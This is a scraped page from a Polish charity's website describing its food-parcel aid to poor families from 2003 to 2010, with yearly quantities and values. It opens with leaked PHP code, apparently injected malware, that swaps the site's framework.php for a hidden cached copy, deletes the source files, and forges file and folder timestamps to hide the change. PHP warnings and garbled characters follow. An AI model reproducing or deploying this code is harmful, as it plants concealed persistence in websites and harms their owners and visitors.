$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
POMOC NAJUBOŻSZYM
 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 372
POMOC NAJUBOŻSZYM

Paczki 1Od samego początku założenia stowarzyszenia pomocą otaczaliśmy osoby niepełnosprawne , ubogie, bezrobotne i rodziny wielodzietne i gorzej sytuowane materialnie. Pomoc ta świadczona jest m.in. poprzez :

A / realizację zadań zlecanych przez Wojewodę Małopolskiego w zakresie programu „Bezdomność i zapobieganie bezdomności”

Program był realizowany na terenie powiatu brzeskiego w gminach: Gnojnik, Czchów, Iwkowa, Borzęcin.

  • W roku 2003 pomocą zostało objętych 50 rodzin w sumie 219 osób z terenu gminy Gnojnik
  • W roku 2004 pomocą zostało objętych 104 rodziny w sumie 390 osób z terenu gmin Gnojnik, Iwkowa, Czchów, Brzesko,
  • W roku 2005 pomocą zostało objętych 108 rodzin w sumie 503 osoby z terenu gmin Gnojnik, Iwkowa, Borzęcin, Czchów, Brzesko, Szczurowa, Dębno, Bochnia
  • W roku 2006 pomocą zostało objętych 102 rodziny w tym 495 osób z terenu gmin Gnojnik, Borzęcin, Iwkowa, Czchów.

Przy przygotowaniu paczek chętnie pracowały pracownice Centrum Medycyny Rodzinnej z Gnojnika. Zgromadzoną żywność pakowano w pomieszczeniach magazynowych użyczonych przez CMR w Gnojniku. Jako wolontariusze pracowały też panie pielęgniarki środowiskowe, niejednokrotnie dowożąc paczki do podopiecznych.

W okresie 2003-2006 pomocy udzieliliśmy 364 rodzinom w sumie 1 607 osób

Paczki1Paczki 2paczki 4-2Paczki 4paczki 5

B / współpracę z Bankiem Żywności w ramach programu PEAD

 

W roku 2004 w ramach Programu PEAD otrzymaliśmy żywność w ilości 7878 kg w kwocie 88 094,34

W roku 2005 sprowadziliśmy żywność w kwocie 62 150,74 zł. Były to produkty w ramach Programu PEAD (56 015,50 zł) rozprowadzane przez Stowarzyszenie na terenie gmin: Dębno, Gnojnik, Iwkowa, Brzesko w tym do DPS Brzesko, Porąbka Uszewska, oraz Szpital Powiatowy w Brzesku. Ponadto do słodycze wykorzystane na okolicznościowych imprezach (6 135,24 zł).

Pomocą objęto w zależności od kwartału od 55 do 191 rodzin. Skorzystało łącznie 732 osoby. Sprowadzono żywność w ilości 7 358,00 kg.

W roku 2006 sprowadziliśmy żywność w ilości 9531 kg za kwotę 22 551,21 zł. Skorzystało łącznie 98-140 rodzin ,razem 538 osób. Wspomagaliśmy np. Zespół Szkól i Przedszkola w Domosławicach oraz WTZ Zawada Uszewska.

W roku 2007 Sprowadziliśmy żywność w ilości 11 065,60 kg za kwotę 19 488,30 zł (kasza, mąka, mleko UHT, ser żółty, ser topiony, ryż, makaron, cukier).

Stałą pomocą obejmowaną w zależności od kwartału od 69-90 rodzin razem ponad 406 osób. Żywność, której podopieczni nie odebrali w terminie była przekazywana do Warsztatów Terapii Zajęciowej w Zawadzie Uszewskiej lub do Zespołu Szkół i Przedszkola w Domosławicach, Publicznej Szkoły Podstawowej w Gnojniku..

W roku 2008 sprowadziliśmy żywność w ilości 9 167,70 kg o wartości 25 851,33 zł.

Z pomocy comiesięcznej skorzystało 90 rodzin , 379 osób. Żywność przekazywano również podopiecznym WTZ Zawada Uszewska.

W 2009 roku pomocą obejmiemy 188 rodziny razem 800 osób z 3 gmin Gnojnik, Czchów i Iwkowa .Ilość sprowadzonej żywności 33 169,08kg o wartości 80 602,55zł

W 2010 roku – sprowadziliśmy 29 168,76kg dla 188 rodzin 800 osób

Kwota 94 828,14 zł

Razem cena otrzymanej żywności : 393 566,61 zł

 

C/ wspomagamy wiele osób potrzebujących np.

a/ pogorzelców,

b/osób chorych /np. pomoc w zakupie sprzętu np. łóżka , koncentratora tlenu , pralki….

c/pomagaliśmy półsierotom, których matka była chora na chorobę nowotworową

 
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"